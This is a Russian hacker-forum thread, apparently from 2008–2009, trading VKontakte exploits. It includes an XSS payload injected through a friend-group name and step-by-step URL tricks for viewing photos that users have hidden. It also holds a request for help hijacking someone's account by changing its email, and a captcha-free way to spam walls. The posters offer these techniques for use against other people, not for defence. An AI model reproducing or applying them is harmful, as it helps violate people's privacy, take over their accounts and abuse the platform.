8)Чтобы зафиксировать статус надо кликнуть в любой точке экрана. Чтобы статус остался, т.к. Enter'ом уже его зафиксировать не получаеться=)

bublebuble
31.12.2008, 04:47
эммм все массовые отмечалки людей на фотке погибли( насчёт остальных не тестил), есть рабочие?

*eXe*
31.12.2008, 05:49
эммм все массовые отмечалки людей на фотке погибли( насчёт остальных не тестил), есть рабочие?
http://vkontakte.ru/board.php?act=topic&tid=13254825

bublebuble
31.12.2008, 08:38
http://vkontakte.ru/board.php?act=topic&tid=13254825
да, спасибо, 5 мин назад нашёл уже :)

*eXe*
31.12.2008, 08:43
*eXe*
было как зделать... но у меня ща в опере не паште.. вот если что переделайте код:

-скачивание аудио, видео и приложений с сайта Вконтакте.РУ и YouTube.com;
-вставка изображений на стену пользователя или группы. В отличие от других программ и онлайн сервисов не требуется вводить личные данные и пароль;
-возможность писать многострочные статусы;
-поддержка Прокси-сервера;
-программа легка в использовании и не требует установки.

офсайт
http://vklife.ru/

скачать
http://depositfiles.com/files/6762255
http://ifolder.ru/7460797

F1shka
31.12.2008, 18:12
>>>офсайт
http://vklife.ru/
ну я думаю что они и покупают аки от Вк)))

ad1d0s
31.12.2008, 18:28
да, спасибо, 5 мин назад нашёл уже :)

УЖе не работает или я нуб 0_оооо_о

bublebuble
31.12.2008, 18:29
всё пашет, тестил на лисичке последней

F1shka
31.12.2008, 18:53
ехе там авторизация по хешу идёт, оно понятно.
Вопрос
НАХРЕНА ИМ АКК БЕЗ МЫЛА? надежда на одинаковые пассы?

*eXe*
31.12.2008, 19:03
ехе там авторизация по хешу идёт, оно понятно.
Вопрос
НАХРЕНА ИМ АКК БЕЗ МЫЛА? надежда на одинаковые пассы?
у тебя паранойа)))

The matrix
01.01.2009, 05:21
ХЗ может и находил кто...
Короче XSS
заходим в "Мои друзья" переименовываем группу например "Работа" на
<img src=antichat onerror=alert(1)>
После того, как мы это сделаем вылетит алерт...
Но она не будет действовать как активная. Если обновить страницу ничего не будет наш злой скрипт будет мягко говоря "испорчен" фильтрами тоесть реализация очень геморная. Там странный фильтр стоит бьет слеши и "javascript" Через onerror все работает.

geforse
01.01.2009, 13:29
The matrix похожая XSS, если на стене написать !antichat :)

*eXe*
01.01.2009, 14:09
http://s59.radikal.ru/i165/0901/80/139fa8b4aa88.bmp (http://www.radikal.ru)

счётчик упал ппц

ad1d0s
01.01.2009, 14:13
http://s59.radikal.ru/i165/0901/80/139fa8b4aa88.bmp (http://www.radikal.ru)

счётчик упал ппц
мб это всех спамеров и клонов дурова поудаляли вот и стала 12 милионов :D

The matrix
01.01.2009, 17:55
The matrix похожая XSS, если на стене написать !antichat :)
Это вообще не XSS . Вылетает только сообщение. А нужно чтоб хоть как-то было близко к выполнению сценария в браузере жертвы.

MCSnake
01.01.2009, 18:41
http://s59.radikal.ru/i165/0901/80/139fa8b4aa88.bmp (http://www.radikal.ru)

счётчик упал ппц
хз мне дак кажется там вообще тупо стоит счетчик каждой секунды:D я ради прикола ввел id23000000 дак там мне ведливо сказали что страница не создана еще:D одно что контакт первый по посещаемости сайт:D

I love this game
01.01.2009, 19:20
Нашел баг, когда нажимаешь просмотр фотографий с пользователем, если фотки скрыты и их нельзя просмотреть, то снизу жме "Включить ускоренный режим просмотра фотографий »" и смотрим закрытые фотки!

Stz1
01.01.2009, 21:36
Нашел баг, когда нажимаешь просмотр фотографий с пользователем, если фотки скрыты и их нельзя просмотреть, то снизу жме "Включить ускоренный режим просмотра фотографий »" и смотрим закрытые фотки!
аха..давно спалил ужЕ:)

хотел щас написать:)

_nic
01.01.2009, 22:48
Нашел баг, когда нажимаешь просмотр фотографий с пользователем, если фотки скрыты и их нельзя просмотреть, то снизу жме "Включить ускоренный режим просмотра фотографий »" и смотрим закрытые фотки!
А закрытые альбомы можно как то смотреть?

Stz1
02.01.2009, 12:31
Кхм, эту функцию отключили? Что то я ее не вижу =\
внизу фотки

geforse
02.01.2009, 12:31
Кхм, эту функцию отключили? Что то я ее не вижу =\

ещё нет)

Stz1
02.01.2009, 12:32
А закрытые альбомы можно как то смотреть?
нет:)

закрытые фотографий

на которых написано что фотография защищена приватностью

skulltrail
02.01.2009, 12:35
Если пользователь запретил смотреть "фотографии со мной" эта функция не работает =\

Вот, тоже самое, только вручную.
Заходим, например: vkontakte.ru/photos.php?act=user&id=1
Тыкаем в фотку с другом алкоголиком.
Попадаем на страничку vkontakte.ru/photos.php?act=show&id=907_203233&uid=1
Просмотр запрещён. Как и всех фоток, кроме последней. Посмотрим на последнюю фотку.
Справа сверху есть стрелочки — листать фотки. Нажимаем назад, потом вперёд. Опа!
vkontakte.ru/photos.php?act=show&id=33355_22164056&uid=1#907_203233
И тут уже можно листать весь альбом фоток с пользователем!

Beaten_Sect0r
02.01.2009, 13:53
привет, можно как ни будь изменить мэйл в профиле контакта, без подтверждения на страрый или хотябы что ни будь сделать, чтоб хозяин не вернул?

TAULUMyca
02.01.2009, 14:12
пока висит на акк мыло хозяин сможет сделать *выслать пароль *

riks
02.01.2009, 23:16
может кто подскажет... есть такая хрень вконтакте, что если вступаешь в одну группу, автоматически вступаешь в другую?...)))

KOCONA
03.01.2009, 01:02
по поводу фоток в контакте - я обычно открываю фотки если видны их маленькие копии, щелкаю на них, до конца добиваю их в закрытом состоянии, потом иду в кэш, всё барахло копирую в ехсел, там находу id пользователя и заменяю m на x вот примерно что получается

http://cs09.vkontakte.ru/u365838/1417683/m_0d32de5603.jpg

http://cs09.vkontakte.ru/u365838/1417683/m_0d32de5603.jpg

здесь id = 365838 и у этого чела всё проблокировано.

free_kode
03.01.2009, 01:35
по поводу фоток в контакте - я обычно открываю фотки если видны их маленькие копии, щелкаю на них, до конца добиваю их в закрытом состоянии, потом иду в кэш, всё барахло копирую в ехсел, там находу id пользователя и заменяю m на x вот примерно что получается

http://cs09.vkontakte.ru/u365838/1417683/m_0d32de5603.jpg

http://cs09.vkontakte.ru/u365838/1417683/m_0d32de5603.jpg

здесь id = 365838 и у этого чела всё проблокировано.
чо-то я мало чо понял, ну надо просто у адреса артинки сменить букву которая соит перед знаком "_" поставить х

Wrath
03.01.2009, 01:47
чо-то я мало чо понял, ну надо просто у адреса артинки сменить букву которая соит перед знаком "_" поставить х
Которая, я так понял, изменяет размер

s-small
m-medium
x-xtra large

Или мб я что-то путаю :rolleyes:

WhiteBear
03.01.2009, 01:49
может кто подскажет... есть такая хрень вконтакте, что если вступаешь в одну группу, автоматически вступаешь в другую?...)))
нету такой хрени

free_kode
03.01.2009, 01:51
Которая, я так понял, изменяет размер

s-small
m-medium
x-xtra large

Или мб я что-то путаю :rolleyes:
ну чертовски верно, тока о чём пост передомной, что он описывал?

ToniKapuchon
03.01.2009, 01:53
замена буквы давно уже не катит!!

free_kode
03.01.2009, 01:54
замена буквы давно уже не катит!!
ну я там давно уже небыл :)

Calcutta
03.01.2009, 12:08
Есть фича, можно спамить пустыми сообщениями на стене)
пустые месаги не проверяются и капча не вылазит)

Swedesh
03.01.2009, 14:25
Есть фича, можно спамить пустыми сообщениями на стене)
пустые месаги не проверяются и капча не вылазит)
Смысол слать пустые мессаги ?

*eXe*
03.01.2009, 14:31
Смысол слать пустые мессаги ?
флудерасты ф теме))))